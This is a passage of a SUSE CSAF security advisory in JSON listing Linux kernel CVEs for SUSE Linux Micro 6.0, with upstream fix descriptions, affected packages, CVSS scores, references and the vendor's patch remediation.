"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68195"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68201",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68201"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: remove two invalid BUG_ON()s\n\nThose can be triggered trivially by userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68201",
"url": "https://www.suse.com/security/cve/CVE-2025-68201"
},
{
"category": "external",
"summary": "SUSE Bug 1255136 for CVE-2025-68201",
"url": "https://bugzilla.suse.com/1255136"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68201"
},
{
"cve": "CVE-2025-68204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npmdomain: arm: scmi: Fix genpd leak on provider registration failure\n\nIf of_genpd_add_provider_onecell() fails during probe, the previously\ncreated generic power domains are not removed, leading to a memory leak\nand potential kernel crash later in genpd_debug_add().\n\nAdd proper error handling to unwind the initialized domains before\nreturning from probe to ensure all resources are correctly released on\nfailure.\n\nExample crash trace observed without this fix:\n\n | Unable to handle kernel paging request at virtual address fffffffffffffc70\n | CPU: 1 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.18.0-rc1 #405 PREEMPT\n | Hardware name: ARM LTD ARM Juno Development Platform/ARM Juno Development Platform\n | pstate: 00000005 (nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n | pc : genpd_debug_add+0x2c/0x160\n | lr : genpd_debug_init+0x74/0x98\n | Call trace:\n | genpd_debug_add+0x2c/0x160 (P)\n | genpd_debug_init+0x74/0x98\n | do_one_initcall+0xd0/0x2d8\n | do_initcall_level+0xa0/0x140\n | do_initcalls+0x60/0xa8\n | do_basic_setup+0x28/0x40\n | kernel_init_freeable+0xe8/0x170\n | kernel_init+0x2c/0x140\n | ret_from_fork+0x10/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68204",
"url": "https://www.suse.com/security/cve/CVE-2025-68204"
},
{
"category": "external",
"summary": "SUSE Bug 1255224 for CVE-2025-68204",
"url": "https://bugzilla.suse.com/1255224"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68204"
},
{
"cve": "CVE-2025-68206",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68206"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_ct: add seqadj extension for natted connections\n\nSequence adjustment may be required for FTP traffic with PASV/EPSV modes.\ndue to need to re-write packet payload (IP, port) on the ftp control\nconnection. This can require changes to the TCP length and expected\nseq / ack_seq.\n\nThe easiest way to reproduce this issue is with PASV mode.\nExample ruleset:\ntable inet ftp_nat {\n ct helper ftp_helper {\n type \"ftp\" protocol tcp\n l3proto inet\n }\n\n chain prerouting {\n type filter hook prerouting priority 0; policy accept;\n tcp dport 21 ct state new ct helper set \"ftp_helper\"\n }\n}\ntable ip nat {\n chain prerouting {\n type nat hook prerouting priority -100; policy accept;\n tcp dport 21 dnat ip prefix to ip daddr map {\n\t\t\t192.168.100.1 : 192.168.13.2/32 }\n }\n\n chain postrouting {\n type nat hook postrouting priority 100 ; policy accept;\n tcp sport 21 snat ip prefix to ip saddr map {\n\t\t\t192.168.13.2 : 192.168.100.1/32 }\n }\n}\n\nNote that the ftp helper gets assigned *after* the dnat setup.\n\nThe inverse (nat after helper assign) is handled by an existing\ncheck in nf_nat_setup_info() and will not show the problem.\n\nTopoloy:\n\n +-------------------+ +----------------------------------+\n | FTP: 192.168.13.2 | \u003c-\u003e | NAT: 192.168.13.3, 192.168.100.1 |\n +-------------------+ +----------------------------------+\n |\n +-----------------------+\n | Client: 192.168.100.2 |\n +-----------------------+\n\nftp nat changes do not work as expected in this case:\nConnected to 192.168.100.1.\n[..]\nftp\u003e epsv\nEPSV/EPRT on IPv4 off.\nftp\u003e ls\n227 Entering passive mode (192,168,100,1,209,129).\n421 Service not available, remote server has closed connection.\n\nKernel logs:\nMissing nfct_seqadj_ext_add() setup call\nWARNING: CPU: 1 PID: 0 at net/netfilter/nf_conntrack_seqadj.c:41\n[..]\n __nf_nat_mangle_tcp_packet+0x100/0x160 [nf_nat]\n nf_nat_ftp+0x142/0x280 [nf_nat_ftp]\n help+0x4d1/0x880 [nf_conntrack_ftp]\n nf_confirm+0x122/0x2e0 [nf_conntrack]\n nf_hook_slow+0x3c/0xb0\n ..\n\nFix this by adding the required extension when a conntrack helper is assigned\nto a connection that has a nat binding.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68206",
"url": "https://www.suse.com/security/cve/CVE-2025-68206"
},
{
"category": "external",
"summary": "SUSE Bug 1255142 for CVE-2025-68206",
"url": "https://bugzilla.suse.com/1255142"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68206"
},
{
"cve": "CVE-2025-68208",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68208"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: account for current allocated stack depth in widen_imprecise_scalars()\n\nThe usage pattern for widen_imprecise_scalars() looks as follows:\n\n prev_st = find_prev_entry(env, ...);\n queued_st = push_stack(...);\n widen_imprecise_scalars(env, prev_st, queued_st);\n\nWhere prev_st is an ancestor of the queued_st in the explored states\ntree. This ancestor is not guaranteed to have same allocated stack\ndepth as queued_st. E.g. in the following case:\n\n def main():\n for i in 1..2:\n foo(i) // same callsite, differnt param\n\n def foo(i):\n if i == 1:\n use 128 bytes of stack\n iterator based loop\n\nHere, for a second \u0027foo\u0027 call prev_st-\u003eallocated_stack is 128,\nwhile queued_st-\u003eallocated_stack is much smaller.\nwiden_imprecise_scalars() needs to take this into account and avoid\naccessing bpf_verifier_state-\u003eframe[*]-\u003estack out of bounds.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68208",
"url": "https://www.suse.com/security/cve/CVE-2025-68208"
},
{
"category": "external",
"summary": "SUSE Bug 1255227 for CVE-2025-68208",
"url": "https://bugzilla.suse.com/1255227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68208"
},
{
"cve": "CVE-2025-68209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlx5: Fix default values in create CQ\n\nCurrently, CQs without a completion function are assigned the\nmlx5_add_cq_to_tasklet function by default. This is problematic since\nonly user CQs created through the mlx5_ib driver are intended to use\nthis function.\n\nAdditionally, all CQs that will use doorbells instead of polling for\ncompletions must call mlx5_cq_arm. However, the default CQ creation flow\nleaves a valid value in the CQ\u0027s arm_db field, allowing FW to send\ninterrupts to polling-only CQs in certain corner cases.\n\nThese two factors would allow a polling-only kernel CQ to be triggered\nby an EQ interrupt and call a completion function intended only for user\nCQs, causing a null pointer exception.\n\nSome areas in the driver have prevented this issue with one-off fixes\nbut did not address the root cause.\n\nThis patch fixes the described issue by adding defaults to the create CQ\nflow. It adds a default dummy completion function to protect against\nnull pointer exceptions, and it sets an invalid command sequence number\nby default in kernel CQs to prevent the FW from sending an interrupt to\nthe CQ until it is armed. User CQs are responsible for their own\ninitialization values.\n\nCallers of mlx5_core_create_cq are responsible for changing the\ncompletion function and arming the CQ per their needs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68209",
"url": "https://www.suse.com/security/cve/CVE-2025-68209"
},
{
"category": "external",
"summary": "SUSE Bug 1255230 for CVE-2025-68209",
"url": "https://bugzilla.suse.com/1255230"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68209"
},
{
"cve": "CVE-2025-68217",
"ids": [
{
"system_name": "SUSE CVE Page",
